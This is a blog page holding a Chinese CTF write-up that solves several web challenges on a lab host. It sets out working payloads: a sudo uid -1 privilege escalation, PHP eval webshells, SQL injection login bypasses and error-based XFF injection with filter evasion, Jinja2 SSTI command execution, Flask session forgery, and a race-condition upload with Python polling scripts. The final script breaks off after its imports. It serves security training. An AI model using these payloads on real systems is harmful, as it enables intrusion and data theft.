<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    // Theme (NexT) runtime namespace emitted by Hexo: reuse the object if an
    // earlier script already created window.NexT, otherwise start a fresh one.
    var NexT = window.NexT || {};
    // Serialized theme options consumed by the NexT scripts loaded later in the
    // page (sidebar, local search, motion effects, ...); `hostname`/`root` are
    // the site base used when building links and search paths.
    var CONFIG = {"hostname":"ton_andy.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="数据方面、网络安全方面的记事本">
<meta property="og:type" content="website">
<meta property="og:title" content="dong&#39;s blog">
<meta property="og:url" content="https://ton_andy.gitee.io/index.html">
<meta property="og:site_name" content="dong&#39;s blog">
<meta property="og:description" content="数据方面、网络安全方面的记事本">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="dong">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ton_andy.gitee.io/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  // Per-page flags read by the NexT scripts: this is the index page (isHome),
  // not a single post (isPost), no sidebar override, and the page language is 'en'.
  CONFIG.page = {
    sidebar: "",
    isHome : true,
    isPost : false,
    lang   : 'en'
  };
</script>

  <title>dong's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>


    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content index posts-expand">
            
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/17/2021%E4%B8%80%E4%BA%9B%E7%BB%83%E4%B9%A0%E9%A2%98wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/17/2021%E4%B8%80%E4%BA%9B%E7%BB%83%E4%B9%A0%E9%A2%98wp/" class="post-title-link" itemprop="url">2021一些练习题wp</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-01-17 20:51:31 / Modified: 20:54:54" itemprop="dateCreated datePublished" datetime="2022-01-17T20:51:31+08:00">2022-01-17</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><p><img src="/.io//0081Kckwgy1gk60rvnegsj30dz06gq38.jpg" alt="屏幕快照 2020-10-29 上午10.59.13"></p>
<p><a target="_blank" rel="noopener" href="http://192.168.4.3:20001/flag.txt">http://192.168.4.3:20001/flag.txt</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this is a fake flag, real flag is in /root/flag.txt</span><br></pre></td></tr></table></figure>

<p>查看报错页面（报错页里可以看到服务器版本信息）</p>
<p><img src="/.io//0081Kckwgy1gk6101orocj309m05jaac.jpg" alt="屏幕快照 2020-10-29 上午11.03.34"></p>
<p>Tomcat 7.0.79 存在任意文件上传漏洞（应为 CVE-2017-12615：Tomcat 7.0.0–7.0.79 在 conf/web.xml 中把 DefaultServlet 的 <code>readonly</code> 参数设为 false 时，可以通过 HTTP PUT 直接写入 JSP 文件。该参数默认为 true，所以这是一个配置前提；修复方式是升级到 7.0.81+ 或把 readonly 改回 true。）</p>
<p><img src="/.io//0081Kckwgy1gk60zyum55j30f70ezmz6.jpg" alt="屏幕快照 2020-10-29 上午11.07.03"></p>
<p><img src="/.io//0081Kckwgy1gk6144yvmrj30e106zgmw.jpg" alt="屏幕快照 2020-10-29 上午11.10.47"></p>
<p>Payload（拿到命令执行后在目标上运行。<code>sudo -u#-1</code> 利用的是 sudo 的 CVE-2019-14287：sudo &lt; 1.8.28 且 sudoers 规则允许以"除 root 外的任意用户"执行，例如 <code>(ALL, !root)</code> 时，把目标 uid 指定为 -1 或 4294967295 会被当成 uid 0 执行。）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -u#-1 cat /root/flag.txt</span><br><span class="line">flag&#123;4403677dc0a7dc9461c7a2f5afcb1ef4&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Web2"><a href="#Web2" class="headerlink" title="Web2"></a>Web2</h2>
<p><img src="/.io//0081Kckwgy1gk616r3bfwj30ij05q0sy.jpg" alt="屏幕快照 2020-10-29 上午11.13.34"></p>
<p>上传马</p>
<p><img src="/.io//0081Kckwgy1gk61gc6lnmj309t01laa0.jpg" alt="屏幕快照 2020-10-29 上午11.22.20"></p>
<p><code>?</code> 被过滤，无法使用 <code>&lt;?php</code> 开头的一句话木马，改用 PHP 的 script 标签写法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;php&quot;&gt;eval($_POST[&#x27;cmd&#x27;]);&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>注意：<code>&lt;script language="php"&gt;</code> 这种标签形式只在 PHP 5.x 及更早版本有效，PHP 7.0 起已经移除，所以这个绕过只对旧版本 PHP 生效。</p>



<h2 id="sqlsql"><a href="#sqlsql" class="headerlink" title="sqlsql"></a>sqlsql</h2><p>地址:192.168.4.3<br>端口:20003<br>详情:sqlsql</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;source&#x27;])) &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$pattern = &#x27;/(\s|UNION|OR|=|TRUE|FALSE|&gt;|&lt;|IS|LIKE|BETWEEN|REGEXP|--|#|!|\^|;|\/|\*|\|)/i&#x27;;</span><br><span class="line">if (isset($_POST[&#x27;username&#x27;]) &amp;&amp; isset($_POST[&#x27;password&#x27;])) &#123;</span><br><span class="line"></span><br><span class="line">    if (preg_match($pattern, $_POST[&#x27;username&#x27;], $matches)) &#123;</span><br><span 
class="line">        var_dump($matches);</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">    if (preg_match($pattern, $_POST[&#x27;password&#x27;], $matches)) &#123;</span><br><span class="line">        var_dump($matches);</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $pdo = new PDO(&#x27;mysql:host=localhost;dbname=sqlsql;charset=utf8;&#x27;, &#x27;root&#x27;, &#x27;sqlpass&#x27;);</span><br><span class="line">    $pdo-&gt;setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);</span><br><span class="line">    $stmt = $pdo-&gt;prepare(&quot;SELECT username from users where username=&#x27;$&#123;_POST[&#x27;username&#x27;]&#125;&#x27; and password=&#x27;$&#123;_POST[&#x27;password&#x27;]&#125;&#x27;&quot;);</span><br><span class="line">    $stmt-&gt;execute();</span><br><span class="line">    $result = $stmt-&gt;fetchAll();</span><br><span class="line">    if (count($result) &gt; 0) &#123;</span><br><span class="line">        if ($result[0][&#x27;username&#x27;] == &#x27;admin&#x27;) &#123;</span><br><span class="line">            echo include(&#x27;flag.php&#x27;);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            echo &#x27;Lo .. Logining as &#x27; .  $result[0][&#x27;username&#x27;] . &#x27;!&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">    echo &#x27;Failed&#x27;;</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line">include &quot;form.php&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>根源在于 <code>prepare()</code> 里直接把 <code>$_POST</code> 拼进 SQL 字符串、没有使用占位符，"预处理"形同虚设，唯一的防线就是上面那条黑名单正则。思路：避开被过滤的空格、<code>=</code>、<code>OR</code>、注释符等，只靠引号闭合和算术运算让 <code>password</code> 条件为真。</p>
<p>万能密码 </p>
<p>payload </p>
<p><code>username=admin&amp;password='-0-'</code></p>
<p>sql语句为： </p>
<p><code>SELECT username from users where username='admin' and password=''-0-''</code></p>
<p><code>username=admin'and&amp;password=+'1</code>（注意 <code>+</code> 在 x-www-form-urlencoded 请求体里会被解码成空格而命中正则里的 <code>\s</code>，用 Burp 直接改包时应写成 <code>%2B</code>）</p>
<p>sql语句为： </p>
<p><code>SELECT username from users where username='admin'and' and password='+'1'</code></p>
<p><code>select ''-0-'';</code> 的值为 0。<code>-</code> 的优先级高于 <code>=</code>，所以 <code>password=''-0-''</code> 实际就是 <code>password=0</code>；当 password 是不以数字开头的字符串时会被隐式转换成 0，比较结果为 1，即为真。</p>
<p><code>select ' and password='+'1';</code> 的值为 1（字符串 <code>' and password='</code> 转成数字是 0，加 <code>'1'</code> 得 1），整条语句等价于 <code>select * from user where username='admin'and'1'</code>，也就是 <code>username='admin' and 1</code>。</p>
<h2 id="web44-UnderGroundCity"><a href="#web44-UnderGroundCity" class="headerlink" title="web44  UnderGroundCity"></a>web44  UnderGroundCity</h2><p>地址:192.168.4.3<br>端口:12004<br>详情:web44</p>
<p>推荐一个能把Python代码给编译成一句话的形式工具<br>官网 <a target="_blank" rel="noopener" href="http://www.onelinerizer.com/">http://www.onelinerizer.com/</a><br>Github地址：<a target="_blank" rel="noopener" href="https://github.com/csvoss/onelinerizer">https://github.com/csvoss/onelinerizer</a></p>
<p>在报错页面的 HTML 源码里发现提示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;/footer&gt;</span><br><span class="line">    &lt;!-- maybe ssti help u--&gt;</span><br></pre></td></tr></table></figure>

<p>测试：</p>
<p><img src="/.io//0081Kckwgy1gk67bleec2j30lz0aygmw.jpg" alt="屏幕快照 2020-10-29 下午2.45.26"></p>
<p>确定为模板注入</p>
<p>依次提交下面的表达式（<code>__subclasses__()</code> 列表的下标随 Python 版本和环境变化，要先打印整个列表找到 <code>os._wrap_close</code> 的位置，这道题是 44）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__</span><br><span class="line">&quot;&quot;.__class__.__bases__  # 返回(&lt;class &#x27;object&#x27;&gt;,)</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()# 找到os._wrap_close 查index</span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__mro__[1].__subclasses__()&#125;&#125; # 找到os._wrap_close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44]&#125;&#125; # os._wrap_close</span><br><span class="line"></span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44].__init__.__globals__[&#x27;popen&#x27;](&#x27;ls&#x27;).read()&#125;&#125;  # 执行ls</span><br><span class="line"># themes web.py</span><br><span class="line">&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[44].__init__.__globals__[&#x27;popen&#x27;](&#x27;cat web.py&#x27;).read()&#125;&#125;  # 执行cat</span><br><span class="line">出错，在看index</span><br><span class="line"></span><br><span class="line">找到flag</span><br><span class="line">flag&#123;vlun_ssti_to_s3cret&#125;</span><br></pre></td></tr></table></figure>

<p>Way2：通过 Flask 的 <code>url_for.__globals__</code> 取到 <code>current_app</code>，直接读它的 <code>config</code> 拿到 SECRET_KEY，再伪造 session。第二种写法用 <code>'curr'+'ent_app'</code> 拼接字符串，应是为了绕过对 <code>current_app</code> 的关键字过滤。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[&#x27;current_app&#x27;].config&#125;&#125;</span><br><span class="line">&#123;&#123;url_for.__globals__[&#x27;curr&#x27;+&#x27;ent_app&#x27;].config&#125;&#125;  # 读取config</span><br><span class="line"># &#x27;SECRET_KEY&#x27;: &#x27;flag&#123;FakeFlagAndTryToVisit/admin&#125;&#x27;,</span><br><span class="line"># 根据提示，需要访问/admin</span><br><span class="line">需要构造cookie</span><br><span class="line"></span><br><span class="line">解密:python flask_session_manager.py decode -s SECRET_KEY -c session</span><br><span class="line">加密:python flask_session_manager.py encode -s SECRET_KEY -t 未加密session</span><br></pre></td></tr></table></figure>

<p>抓包，把 Cookie 里的 session 换成用泄露的 SECRET_KEY 重新签名后的值（具体要改哪个字段看 decode 出来的 session 内容），再访问 /admin 得到 flag。注意 Flask 的 session cookie 只是用 itsdangerous 签名而不是加密：decode 读明文不需要密钥，encode 伪造才需要 SECRET_KEY——所以 SECRET_KEY 一旦泄露就等于可以伪造任意会话。</p>
<h2 id="Simple-SQLi"><a href="#Simple-SQLi" class="headerlink" title="Simple_SQLi"></a>Simple_SQLi</h2>
<p>地址:192.168.4.3<br>端口:20005<br>详情:Simple_SQLi</p>
<p>页面回显了客户端 IP，而 <code>X-Forwarded-For</code> 完全由客户端控制，所以考虑 XFF 注入。</p>
<p><code>X-Forwarded-For: 127.0.0.2</code></p>
<p>下面的探测过程中，<code>or</code>、<code>select</code>（从 <code>flflagag</code> 双写生效看，<code>flag</code> 也一样）等关键字被过滤，但从双写能绕过来看只是单次删除，所以用 <code>anandd</code>、<code>seselectlect</code>、<code>infoorrmation_schema</code> 这类双写绕过（<code>information</code> 里的 <code>or</code> 也会被删）。另外 <code>extractvalue()</code> 的报错信息最多只回显 32 个字符，所以 flag 要用 <code>substring</code> 分两段读出。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: 0.0.0.0&#x27;</span><br><span class="line">得到</span><br><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#x27;&#x27;0.0.0.0&#x27;&#x27;)&#x27; at line 1</span><br><span class="line"></span><br><span class="line">发现报错回显，使用报错注入</span><br><span class="line">&#x27;or extractvalue(1,(select concat(0x7e,(select user()))))#</span><br><span class="line">回显：near &#x27;extractvalue(1,( concat(0x7e,( user()))))#&#x27;)&#x27; at line 1</span><br><span class="line">过滤了 or select</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user())))#</span><br><span class="line">无法显示，报错，</span><br><span class="line">加) 右括号</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user()))))#</span><br><span 
class="line"></span><br><span class="line">payload</span><br><span class="line"></span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect user()))))#</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect database()))))#</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(schema_name)from(infoorrmation_schema.schemata)  )))#</span><br><span class="line">XPATH syntax error: &#x27;~Xff_1s_fuNny,information_schema&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(table_name)from(infoorrmation_schema.tables)where table_schema=&quot;Xff_1s_fuNny&quot;  ))))#</span><br><span class="line">XPATH syntax error: &#x27;~Store,flag,t_session,ALL_PLUGIN&#x27;</span><br><span class="line"></span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(column_name)from(infoorrmation_schema.columns) where table_name=&quot;flag&quot; ))))#</span><br><span class="line">无回显</span><br><span class="line">flag 双写解决</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect group_concat(column_name)from(infoorrmation_schema.columns) where table_name=&quot;flflagag&quot; ))))#</span><br><span class="line">XPATH syntax error: &#x27;~flag&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect substring(group_concat(flflagag),1,32)from flflagag ))))#</span><br><span class="line">XPATH syntax error: &#x27;~flag&#123;14e1b600b1fd579f47433b88e8&#x27;</span><br><span class="line">&#x27; anandd extractvalue(1,concat(0x7e,(seselectlect substring(group_concat(flflagag),32,64)from flflagag ))))#</span><br><span class="line">XPATH syntax error: &#x27;~d85291&#125;&#x27;</span><br></pre></td></tr></table></figure>



<h2 id="web6-upppppppload"><a href="#web6-upppppppload" class="headerlink" title="web6  upppppppload"></a>web6  upppppppload</h2><p>地址:192.168.4.3<br>端口:20006<br>详情:upppppppload</p>
<p>考点：代码审计 + 条件竞争 + 一次请求里上传两个文件</p>
<p>1. 目录扫描（御剑）发现 index.php.txt（源码备份）和 flag.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$name</span> = <span class="string">&#x27;upload_&#x27;</span>.rand(<span class="number">10</span>,<span class="number">15</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$ext</span>;<span class="comment">#随机生成10-15的文件名形如upload_10.jpg</span></span><br><span class="line"><span class="variable">$upload</span> = <span class="keyword">new</span> file_upload(<span class="variable">$_FILES</span>,<span class="string">&#x27;./uploads/&#x27;</span>,<span class="variable">$name</span>,<span class="string">&#x27;jpg|jpeg|gif|png&#x27;</span>);<span class="comment">#生成file_upload的对象</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_file</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;  <span class="comment"># foreach（漏洞利用点）</span></span><br><span class="line"><span class="keyword">$this</span>-&gt;file = <span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>];<span class="comment">#临时文件名 </span></span><br><span class="line"><span class="keyword">$this</span>-&gt;file_name = <span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>];<span class="comment">#文件名 默认为表单里设置的myfile </span></span><br><span class="line"><span class="keyword">$this</span>-&gt;file_size = <span class="variable">$file</span>[<span class="string">&#x27;size&#x27;</span>];<span class="comment">#文件大小 </span></span><br><span class="line"><span class="keyword">$this</span>-&gt;file_type = <span class="variable">$file</span>[<span class="string">&#x27;type&#x27;</span>];<span class="comment">#文件类型 </span></span><br><span class="line"><span class="keyword">$this</span>-&gt;file_error = <span class="variable">$file</span>[<span class="string">&#x27;error&#x27;</span>];<span class="comment">#文件错误 </span></span><br><span class="line"><span class="keyword">$this</span>-&gt;ext = get_file_ext(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]);<span class="comment">#获取上传的文件名后缀</span></span><br><span class="line"><span class="comment"># 循环结束后 $this-&gt;ext 是最后一个文件的后缀，所以校验的是最后一个上传的文件名</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#move_uploaded_file函数保存文件，然后对保存目录下文件的后缀名进行校验。注意 sleep() 参数是整数秒，sleep(0.1) 会被截断成 0，几乎没有延迟。</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save_file</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;check_ext_is_allow()===<span class="literal">false</span>)</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;jpg|jpeg|gif|png&quot;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span>(!is_writable(<span class="keyword">$this</span>-&gt;savepath)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!is_uploaded_file(<span class="keyword">$this</span>-&gt;file)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!move_uploaded_file(<span class="keyword">$this</span>-&gt;file,<span class="keyword">$this</span>-&gt;savepath.<span class="keyword">$this</span>-&gt;savename)) <span class="keyword">die</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span> (<span class="keyword">$this</span>-&gt;savename);</span><br><span class="line">    sleep(<span class="number">0.1</span>);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;file_unsafe_check(<span class="keyword">$this</span>-&gt;savepath);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>构造一次请求上传两个文件：第一个文件后缀为 php，第二个后缀为 jpg。后缀校验只看循环里最后一个文件（jpg），而两个文件都已经被 move_uploaded_file 落盘，然后利用条件竞争，在 file_unsafe_check 处理掉 php 文件之前访问它执行命令。</strong> 注意 PHP 的 <code>sleep()</code> 参数是整数秒，<code>sleep(0.1)</code> 会被截断为 0（PHP 8.1 起还会报弃用警告），也就是几乎没有延迟——竞争窗口只有 <code>move_uploaded_file</code> 到 <code>file_unsafe_check</code> 之间那一小段，所以访问脚本要尽量高频地请求。</p>
<p>Way1,使用burp发送payload,python 读</p>
<p>Burp 请求体（两处需要核对：各 part 分隔行的 boundary 必须与请求头 Content-Type 里声明的完全一致，下面第 5、10 行末尾比第 1、6 行多了一个 5，复制时要统一；每个 part 的头部与文件内容之间要空一行，否则 <code>&lt;?php</code> 那行会被当成头部解析）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">-----------------------------3683218435460675451276712263</span><br><span class="line">Content-Disposition: form-data; name=&quot;myfile&quot;; filename=&quot;config.php&quot; </span><br><span class="line">Content-Type: application/octet-stream </span><br><span class="line">&lt;?php eval(system(&#x27;cat flag.php&#x27;)); ?&gt; </span><br><span class="line">-----------------------------36832184354606754512767122635</span><br><span class="line">-----------------------------3683218435460675451276712263</span><br><span class="line">Content-Disposition: form-data; name=&quot;myfile2&quot;; filename=&quot;config.jpg&quot; </span><br><span class="line">Content-Type: application/octet-stream </span><br><span class="line">&lt;?php eval(system(&#x27;cat flag.php&#x27;)); ?&gt; </span><br><span class="line">-----------------------------36832184354606754512767122635--</span><br></pre></td></tr></table></figure>

<p>python（注意：下面两个脚本 for 循环里的 <code>else: break</code> 会在第一个不命中的 URL 处就跳出循环，实际每轮只探测 upload_10.php；去掉 else 分支才能把 11–15 都检查到）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">sign = <span class="number">0</span> </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>: </span><br><span class="line">    <span class="keyword">try</span>: </span><br><span class="line">        <span class="keyword">if</span> sign == <span class="number">0</span>: </span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>, <span class="number">16</span>): </span><br><span class="line">                url = <span class="string">&quot;http://192.168.4.3:20006/uploads/upload_&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;.php&quot;</span> </span><br><span class="line">                <span class="comment"># print url </span></span><br><span class="line">                response = requests.get(url) </span><br><span class="line">                code =response.status_code </span><br><span class="line">                content = response.content </span><br><span class="line">                <span class="keyword">if</span> code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">&#x27;flag&#x27;</span> <span class="keyword">in</span> content : </span><br><span class="line">                    <span class="built_in">print</span> content </span><br><span class="line">                    sign =<span class="number">1</span> </span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>: </span><br><span class="line">                    <span class="keyword">break</span> </span><br><span class="line">    <span class="keyword">except</span>: </span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;err&quot;</span></span><br></pre></td></tr></table></figure>

<p>第二种方式是开两个进程，一个不停上传文件，一个不停访问，一步到位读到 flag。两点注意：脚本里的 payload 用的是 <code>cat ../flag.php</code>，因为 webshell 落在 uploads/ 下执行而 flag.php 在上一级目录，上面 Burp 请求体里的 <code>cat flag.php</code> 在那个位置很可能找不到文件；另外 <code>response.content</code> 在 Python 3 下是 bytes，<code>'flag' in content</code> 会抛 TypeError 并被裸 except 吞掉只打印 err，应改用 <code>response.text</code> 或 <code>b'flag'</code>。</p>
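import requests
import re
from multiprocessing import Process, Event

base_url = "http://192.168.4.3:20006/"
# Names the server was observed to give the stored file: upload_10 .. upload_15.
CANDIDATE_IDS = range(10, 16)
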